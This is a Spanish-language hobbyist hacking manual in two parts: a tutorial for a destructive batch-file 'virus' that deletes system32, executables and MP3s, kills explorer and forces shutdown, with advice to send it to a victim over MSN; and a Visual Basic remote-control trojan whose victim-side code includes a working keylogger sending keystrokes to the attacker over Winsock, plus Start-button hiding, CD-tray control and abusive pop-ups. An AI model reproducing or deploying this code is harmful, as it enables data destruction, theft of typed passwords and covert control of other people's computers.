Este manual,explica como crear virus bajo un lenguaje que usa nuestro propio sistema.
Este lenguaje,nos facilita el mejor uso de nuestro ordenador,con diversas ordenes o comandos a través
de nuestra consola,llamada Ms-Dos.
En este manual no voy a enseñar como crear un virus que destruya medio universo,nada de eso,olvidaros de pajas mentales
Mas bien se explica los comandos y las órdenes que daremos a nuestro bichito,y lo que hace mediante
esas órdenes que nosotros le damos.
Lo primero que haremos será abrir nuestra consola, nuestro "ms-dos" y teclear en ella "edit"
Bien,una vez con la consola abierta y listo para hacer nuestro bicho,os explico los comandos que vamos
a ejecutar "sus funciones"
@echo off Sirve que para que nuestro virus no salga en la pantalla,es decir,para que la ventanita del ms-dos no sea mostrada.
title
Tanto como en nuestro virus como en otro programa programado en "batch" sirve para poner un título a la aplicación que hayamos programado.En pocas palabras: "Pone un tituto a nuestro programa"
Del: Comando que se usa explícitamente para borrar carpetas o ficheros,mediante otros comandos se puede
forzar el borrado de la carpeta,o de cualquier otro archivo
Comandos del comando Del:
Comando: /F (Borra los archivos con solo lectura)
Comando: /S (Elimina los archivos indicados)
Comando: /P (Pide confirmación antes de borrar cada archivo)
Net Stop Sirve para parar algun servicio o medio que transcurra a través de nuestro sistema,así como el centro de seguridad,firewall de windows o otro medio de seguridad del equipo.Con este comando,facilita una desactivación de estos servicios,evitando ser activados automáticamente.
Pero a través de este comando,el usuario puede ver como han sido desactivados componentes de su sistema.
taskkill Este comando es usado a la hora de querer matar procesos que corren a través de nuestro sistema.Cuando queremos parar un proceso de nuestro sistema,este comando realiza esa función,mata un proceso específico que le hayamos ordenado,más comodo a la hora de querer meter nuestro virus y matar el antivirus,o matar cualquier otro proceso que lleve a un programa,aplicacion...
start Comando start sirve para empezar una tarea,ya sea abrir el explorador,un programa,una hoja de cálculos (bloc de notas) paint,wordpad,word...Cualquier programa, con solo el comando "start" seguido del programa a ejecutar,ejemplo:
start cmd.exe
:bucle -- goto bucle El comando :bucle sirve para hacer un bucle como su propio nombre indica.Con este comando podemos ejecutar infinitas tareas,programas,aplicaciones,juegos...Todo esto de forma masiva,de modo que lo único que podremos hacer,seria reinicio del ordenador.
y el comando goto bucle,es el que hay que poner una vez indicado la tarea a realizar.Ejemplo:
:bucle
start cmd.exe
goto bucle
Hemos dicho a nuestro virus mediante el comando :bucle y goto bucle que habra infinitos bloc de notas masivamente,esto es un ejemplo,se pueden abrir 1000 programas más.
shutdown Comando shutdown sirve para reiniciar o apagar el ordenador mediante un tiempo estimado que se le añada o otros valores.
Comandos de shutdown:
Comando: -s (Apaga el equipo)
Comando: -r (Apagar y reiniciar el ordenador)
Comando: -a (Anula el apagado del equipo)
Comando: -t 21 (Pone tiempo para el apagado,donde dice 21 son los segundos que tardará en apagarse/reiniciarse.
Comando: -f (Fuerza el cierre de todos los programas sin advertir al usuario)
Empezemos:
Para empezar a hacer nuestro primer bichito,podemos empezar por algo sencillo,en nuestra consola escribimos lo siguiente:
@echo off
Una vez tecleado esto,con el comando "del" podemos indicar que carpeta o fichero borrar.Yo por ejemplo,podría poner este código:
@echo off
del /S /F c:\windows\system32\
del /S /F *exe
del /S /F *mp3
taskkill /f /im "explorer.exe"
shutdown -s -f -t 10 -c "Muestra del virus"
Este es mi virus,es muy básico,ya que puede meterse más código y más dañino,pero con esto,ya es asegurado
Un daño...
Quedaria algo así:
Hasta aquí hemos hecho nuestro código de virus ¡Ojo! no quiero decir que copieis mi código XDD! podeis
buscar la ruta de cualquier programa o archivo y usar los comandos que os expliqué para vuestro virus.
Ahora queda pasarlo a su lenguaje .bat (batch)
para ello,en la misma consola y con el código escrito,hacemos lo siguiente:
Pinchamos en Archivo,Guardar como y ponemos un nombre, como por ejemplo "muestra" y al final de "muestra"
ponemos .bat quedaria así:
muestra.bat
y una vez hecho todo esto,tan solo vamos a nuestro buscador en el equipo (Busqueda) y buscamos
muestra.bat.Lo arrastramos al escritorio y lo comprimimos con el winrar o cualquier compresor.
Y una vez comprimido,se lo mandamos a nuestra victima por msn.
Nota: Esto es tan solo una muestra de como crear un virus en batch,con los códigos explicados.
Siempre eh escuchado que los Lammers usan troyanos y que se dedican a fastidiar a los demás usuarios que están conectados, generalmente un Lammer lo primero que hace después de infectar a un usuario es “decirle que el es un hacker y blablabala”, cuando la verdad de los hechos (como dice el Brother Yankee) no le llega ni a los talones el hediondo!!! Y después de abrirle y cerrarle el lector de CD le Formatea el PC!! La verdad es que eso es lo que mas pena me da, porque ni siquiera reviso su disco duro para ver que bueno podía encontrar alguna información valiosa o algo interesante solamente se dedico a destruir. “Con lo recién comentado no quiere decir que yo nunca lo eh echo, no soy un santo tampoco a rato me da la kaga y dejo la kaga :-P ”. En realidad no me gusta ser tan malo porque se que No todo el mundo sabe formatear, reinstalar Windows mmm además puede que no tengan toda su información guardada en CD’s, viste entonces la gracia no es destruir “aunque me cueste decirlo” pero tienes que tratar de hacer el bien, aprender cada día mas no siempre encontraras manuales y ejemplos hechitos para empezar ausarlos “como este”, si no quede repente tienes que descargarlos de PC’s ajenos =P la gracia seria que la victima nunca se de cuenta que tu estuviste ahí, es la gracia J.
Bueno la verdad de las cosases que es muy divertido usar un buen troyano, auno bueno me refiero al Sub Seven que tiene un montón de opciones y es muy fácil deusar, en pocas palabras tienes dominio total del PC de la victima, pero toda esta maravilla tiene un pero si te pillan en estas pasos turbios un usuario que mas menos se maneje en el asunto o tenga un antivirus que lo detecte vas a tener un solo nombre LAMMER “cada uno tiene lo que se merece no mas” :-P si reconozco que es fuerte que te digan así pero es la pura y santa verdad, pero que pasa cuando uno mismo crea su propio troyano, aparte que los antivirus no lo detectan, creo que merecemos otro nombre no?, no estoy diciendo que somos Hacker ni mucho menos, pero a eso es lo que queremos llegar aser algún día, y es por eso que vamos a crear nuestro propio troyano Jseguramente no se va ser el mejor troyano de la historia, pero si le pones dedicación y lees otros manuales por ahí y juntas varios ejemplos puede que tu troyano llegue ser tan bueno como el Sub Seven , para mi un mayor éxito seria que algún programa que haya creado por ahí lo detecte un antivirus! , bueno pero eso es otro cuento… vamos con una explicación breve de los troyanos y el parentesco que tiene con un virus que muchas veces se confunden :-S
Los troyanos son mas viejos que mi abuela “ojo que mi abuela si que es vieja”, no, pero hablando enserio un troyano tubo que haber surgido cuando se creo la primera red en una universidad de Estados Unidos, porque el simple echo de intercambiar archivos puede recibir el nombre detroyano sin ir mas lejos el Internet Explorer es un troyano , Ustedes se preguntaran porque?, muy simple porque el Explorer trabajaa modo de cliente servidor , en este caso nosotros somos los clientes mandamos información o datos y el servidor procesa para ver que es lo que queremos y nos entrega información devuelta, un troyano trabaja exactamente igual, lo que hace nuestro programa en casa es mandar un dato o palabra clave a la victima… Así como en un Chat!!! Y la victima al recibir esa palabra, cumple la función que le hemos programado xD. Los troyanos no son malignos, malignos son las personas que están detrás del PC que tiene el control.
Se que muchos Lammer van a leer esto y así como también muchos Newbies también, o en bola nadie lo leerá, pero la herramienta esta aquí , ojala que hagan buen uso de esta herramienta y no se dediquen a molestar personas que solamente saben prender el PC para meterse al MSN , sino que busquen victimas que le puedan servir ;-)
Diferencias***
Los troyanos sonprogramas sumamente necesarios en la vida cotidiana por ejemplo el conocidísimo MSNel cual uno puede comunicarse con personas intercambiar imágenes mmm y no se si han indagado mas en el, pero trae unas opciones de pizarra en la cual dibujan los 2 que hablan y también tiene una opción en donde tu tienes el control detu amigo “pero tu amigo tiene que estar conciente y de acuerdo con lo que haces además el ve cada movimiento que haces” y si se te ocurre borrarle algo tu presionando escape lo sakai cagando de tu PC ;-P ….
Los troyanos son reconocidos como virus “por los antivirus” y la verdad de las cosas no son virus si no que programas con opciones varias, en cambio los virus están hechos para destruir y no hay nada que los detenga si es que ya lo haz ejecutado en cambio si estas infectado con un troyano estas adisposición de el que te mando el archivo “onda si anda de buen animo o no xD”.
Maneras de desinfectarse pffff muy sencillo, los troyanos “profesionales” se meten al registro y cuando hechas a correr tu PC se ejecutan solitos y quedan esperando una conexión, entonces para ver que programas se ejecutan al iniciar nuestro PC entraremos a msconfig, en ejecutar msconfig y te fijas bien que programas se inician si ves cualquier cosamedia rara simplemente le sacas el check. O la otra manera que es muy efectiva es en el registro ejecutar “regedit” HKEY_LOCAL_MACHINES\SOFTWARE\Microsoft\Windows\currentversion\Run
Y ahí se ven también todas las aplicaciones que se inician.
Dice clarito Norton Antivirus detecto un virus en tu pc :-SxD
Primero que todo necesitamos saber programar, aunque sea lo mas mínimo en visual Basic. mmm yo tengo el visual Basic 6.0 pero eh visto el visual Basic 5.0 y no tienen grandes diferencias, pero les aconsejo utilizar el visual Basic 6.0 para que no tengan complicaciones xD.
Comenzaremos por un por Master “le llamaremos al que controla a la victima” y después haremos el Victima “hasta el momento haremos solamente el entorno grafico”
Entonces abrimos un .Exe estándar y les agregamos el Winsockque se agrega en la barra de controles \componentesMicrosoft Winsock Control 6.0 ese es el icono del Winsock por si las dudas por ahí.
Nuestro Master vaa tener varias Gracias… unade las cosas mas chistosas “a mi parecer” es el dereproducir música mediante el Winamp 2.xx si tiene instalado el 3 o el 5 estamos cagados xD , la otra cosa que le meteremos es para que se le abra y cierre el lector de CDxD, un keyloger, enviarles mensajes predeterminados. y si andan ociosos para ocultarle el botón de inicio.
El form les tendría que quedar como el de la foto.
*no se preocupen por el scroolbar Azul porque es por el estilo visual que tengo xD
igual el aspecto que me quedo ahora me quedo re lindo J …
Los Botones están en este orden…
NombreCaption
Command1Abrir CD
Command2Cerrar CD
Command3Ocultar inicio
Command4Mostrar inicio
Command5Conectar!!
Command6Guardar log
Command7Comprobar
envcomboEnviar
Command9Abrir Winamp
Command10Cerrar Winamp
Command11|<<
Command12>
Command13| |
Command14O
Command15>>|
Command16<-----------
Command17---------->
El text1 es en donde ubicaremos la IP de la victima y el text2 es en donde recibimos el log de la victima J :
NombreScrollBarsMultiLine
Text10-NoneFalse
Text22-VerticalTrue
Bueno eso es pos ahora veamos como queda el “Victima” ,vamos a echarle un vistazo que elque viene es más sencillo que este “Master”claro que el código fuente se los encargo. Pero veamos la forma visual del Victima, quedaría algo parecido al de la foto deabajo:
NombreIntervalScrollBarsMultiLineVisible
Form1NoneNoneNoneFalse
Timer11NoneNoneNone
Timer21NoneNoneNone
Text1None0-NoneFalseTrue
Text2None2-VerticalTrueTrue
* Los 2 timer tienen que estar enabled
Este form tiene 2 text el primero comprueba el texto que ah sido enviado desde “master”; me explico por ejemplo si el text1 el de arriba recibe la palabra “play”, nosotros lo programamos que cuando llegue esa palabra se abra el Winamp. Y el text2, el de abajo es el que esta captando todas las teclas presionadas por la victima ;-)
Si es que están perdidos, y no entienden nada de nada no se preocupen, que todavía no hemos hecho nada “a si es que les sugiero que vuelvan a leer.”;-Psolamente le estamos dando el aspecto visual a nuestro troyano, aun no tenemos nada de código fuente
….la verdad no quiero pegar el código fuente porque como dije en un principio no vaa faltar el SUPER LAMMER que ni siquiera se va a dar el trabajo de leer mis chistes FOMES :-P y la gracia de este manual no es entregarle el programa echo, si fuera por eso, mejor subiría el programa compilado y todo, a si que ya me decidí… El código fuente lo pego en foto xD.
Pero no se preocupen que lo voya explicar lo mejor posible
Entonces comencemos con el código fuente, de partidael Winsock le debemos poner un puerto al cual nos conectaremos tenemos que pensar en un puerto más o menos elevado para que ningún otro programa lo vaya acerrarpor ejemplo Puerto: 8721
El Winsock del master quedara así:
El Winsock de la victima quedara así:
Empezaremos con el Master
‘En el command6 lo que hace el código fuente es guardar todo el log que has recibido, el log quedara guardado como loger.txt en el directorio en donde ejecutaste el Master.exe
*en el load se agregan los Ítem’sal combo1 los cuales después los enviaremos como bromas pesadas
**bueno ahí están las fotos del código fuente del master, si nos damos cuenta solamente se envían códigos a la victima, y la victima hace la función, es por eso que el código fuente de la Victima no le voy asacar fotos porque seria muy pesado el manual.
Entonces desde aquí comienza el código fuente de la Victima
Primero que todo hay que agregar un modulo el nombre del modulo será “Module1” sin las comillas y el código fuente que hay dentro de este es el siguiente:
'esto es para abrir el lector del CD
Option Explicit
Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal _
lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
' estas declaraciones son del winamp
Option Base 1
'Funciones para poder usar el Winamp
Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As Long) As Long
Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal WndID As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal WndID As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Declare Function CopyDataSendMessage Lib "user32" Alias "SendMessageA" (ByVal WndID As Long, ByVal wMsg As Long, ByVal wParam As Long, ByRef lParam As COPYDATASTRUCT) As Long
Declare Function lstrcpy Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As String) As Long
Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Copien el código tal cual “reconozco que las API’s del Winamp las encontré por ahí y no me acuerdo de que Pág. fue pero espero que el autor no se enoje por haberlas expuesto en este manual”, bueno si te parece mal manadme un mail que era tuyo y yo agregare tu nombre J
Al copiar el codigo se daran cuenta como aparecen la comillay después su explicación ‘en verde ;)
Ahora nos vamos al form de la victima, en general y declaraciones copiamos este código fuente, este codigo s e copia en declaraciones, general
Dim WAClase As String
'declaraciones para el boton del inicio onda kitarlo y volver a ponerlo
Option Explicit
Const WS_CHILD = &H40000000
Const WM_LBUTTONDOWN = &H201
Const WM_LBUTTONUP = &H202
Const SW_HIDE = 0
Const SW_NORMAL = 1
Private Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type
Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function GetWindowRect Lib "user32" (ByVal hwnd As Long, lpRect As RECT) As Long
Private Declare Function CreateWindowEx Lib "user32" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByVal hMenu As Long, ByVal hInstance As Long, lpParam As Any) As Long
Private Declare Function DestroyWindow Lib "user32" (ByVal hwnd As Long) As Long
Dim tWnd As Long, bWnd As Long, ncWnd As Long
'de aquí termina para quitar mostrar inicio
'este es para el keyloger
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Si es que están perdidos en donde poner esas declaraciones les pego su fotito para que se orienten su poquito ;-)
eso de arriba son las declaraciones de la victima y ahora les copio el codigo fuente de la victima:
Private Sub Form_Load()
Timer1.Interval = 1 ‘cada una milésima de Segundo se capta teclas
Timer2.Interval = 1 ‘cada 1 milésima de segundo se borra la caja text
Winsock1.Listen ' deja el programa esperando una conexión
WAClase = "VBE"
End Sub
Private Sub Text1_Change()
If Text1.Text = "quitar_inicio" Then
tWnd = FindWindow("Shell_TrayWnd", vbNullString) 'quita el boton de inicio
ShowWindow bWnd, SW_HIDE ‘al recibir quitar inicio kita el inicio temporalmente
End If
If Text1.Text = "mostrar_inicio" Then
ShowWindow bWnd, SW_NORMAL 'con esta funcion muestra el boton de inicio
End If
If Text1.Text = "abrir_cd" Then
mciSendString "set CDAudio door open", "", 127, 0 'abre el lector decd
End If
If Text1.Text = "cerrar_cd" Then
mciSendString "set CDAudio door closed", "", 127, 0 'cierra el lector de cd
End If
If Text1.Text = "Corporaciones By Jhonykay & Yankee" Then
MsgBox "Corporaciones By Jhonykay & Yankee", vbInformation, "Pantufla69" ' tira un mensaje de error
End If
If Text1.Text = "Error 401 Este pc debe ser formateado xD" Then
MsgBox "Error 401 Este pc debe ser formateado xD", vbCritical, "Pantufla69"
End If
If Text1.Text = "Soi tu dios y decido meterte un dedo en el culo" Then
MsgBox "Soi tu dios y decido meterte un dedo en el culo", vbExclamation, "Pantufla69"
End If
If Text1.Text = "abrir_win" Then StartWinamp WAClase ' abre el winamp
If Text1.Text = "cerrar_win" Then CloseWinamp WAClase 'cierra el winamp
If Text1.Text = "atras_win" Then PreviousTrack WAClase 'tema anterior winamp
If Text1.Text = "play_win" Then PlayTrack WAClase 'reproduce el winamp
If Text1.Text = "pause_win" Then PauseTrack WAClase 'pause ene l winamp
If Text1.Text = "stop_win" Then StopTrack WAClase 'detiene el tema en el winamp
If Text1.Text = "adelante_win" Then NextTrack WAClase 'el tema sig del winamp
If Text1.Text = "RW_win" Then Rewind5Sec WAClase ' retrocede 5 seg winamp
If Text1.Text = "FF_win" Then Forward5Sec WAClase 'adelanta 5 seg winamp
End Sub
Private Sub Text2_Change()
Dim enviar As String
If Winsock1.State = sckConnected Then 'si es que esta establecida la conexión
enviar = Text2.Text'se comienza a enviar los logers
Winsock1.SendData Text2.Text
End If
End Sub
Private Sub Timer1_Timer()
On Error Resume Next'cualquier error no lo representa
Dim enviar As String
Dim x As Integer, i As Integer
For i = 33 To 124
x = GetAsyncKeyState(i)
If x = -32767 Then
Text2.Text = Chr(i) + enviar'texto 2 = a teclaa precionada
End If
Next
x = GetAsyncKeyState(32) ' tecla 32 = al espacio
If x = -32767 Then
Text2.Text = " " 'lo reprecenta como un espacio
End If
End Sub
‘’’’’’ en realidad pueden ir a gregando mas teclas ya que hay varias que nos las reconoce’’’’’’’’’’
Private Sub Timer2_Timer()
Text2.Text = "" 'este timer es para que cuando la victima presione una tecla
'2veces se envia 2 veces :-P
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
Winsock1.Close
Winsock1.Accept requestID
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
Winsock1.GetData datos ' recibe informacion
Text1.Text = ""' despues al recibir otro texto s elimpia el text1
Text1.Text = Text1.Text + datos
End Sub
Bueno ahí están!! Espero que no se complique porque la verdad de esto es muy sencillo
Es mas creo que les será mas fácil copiar el de la victima que el master “ya que el código del master esta en fotos xD wuajajaja (Anti-Lammer’s ) ” pero ojala que les funcione,”de echo funciona muy bien”. Y como les dije a un principio del manual cualquier consulta o reclamo manden me un mail, tratare de contestar todas las preguntas.
Bueno aquí doy punto finala este manual los agradecimientos a todos ustedes que lo leyeron. Y los felicito si es que les resulto y siguieron buscando cosas para agregarle
Espero que les sirva, pero eso si “ojala que no se estén pasando a wuano que son hacker’s ni mxo menos” porque esto lo sabe hacer cualquier programador mas o menos experimentado. Lo otro, si es que este manual llega a algún personaje X que sabe de esto me gustaría mucho que me diera sus opiniones, ya que no lo es del todo perfecto, de echo tiene varios errores ;-) “por favor me gustaría saber sus opiniones para así en un futuro sacar un nuevo manual”
Tengo que agradecer a 2 grandes personajes que me trajeron al mundo de la programación, informáticay “entre otros” a ellos les dedico este manual, saludos para el Maestro Yankee y para el turbio del Don Ramón espero que se encuentren bien y Espero que algún día este modesto manual llegue a su PC.
Join The Community